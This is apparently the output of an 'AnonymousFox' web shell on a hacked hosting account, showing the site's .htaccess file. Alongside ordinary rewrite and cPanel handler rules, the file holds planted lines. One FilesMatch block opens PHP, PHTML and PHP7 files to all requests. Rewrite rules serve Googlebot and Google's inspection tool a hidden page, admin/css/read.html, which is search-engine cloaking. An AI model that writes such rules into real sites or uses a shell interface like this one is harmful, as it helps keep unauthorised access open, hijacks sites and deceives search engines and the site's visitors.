Hacked By AnonymousFox

Current Path : /home/missmand/public_html/
Upload File :
Current File : /home/missmand/public_html/.htaccess

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
<FilesMatch ".(php7|phtml|php)$">
Order allow,deny
Allow from all
</FilesMatch>

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} googlebot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} google-inspectiontool [NC]
RewriteRule ^ admin/css/read.html [L]

# php -- BEGIN cPanel-generated handler, do not edit
# Définissez le package « ea-php74 » comme langage de programmation « PHP » par défaut.
<IfModule mime_module>
  AddHandler application/x-httpd-ea-php74 .php .php7 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit

Hacked By AnonymousFox1.0, Coded By AnonymousFox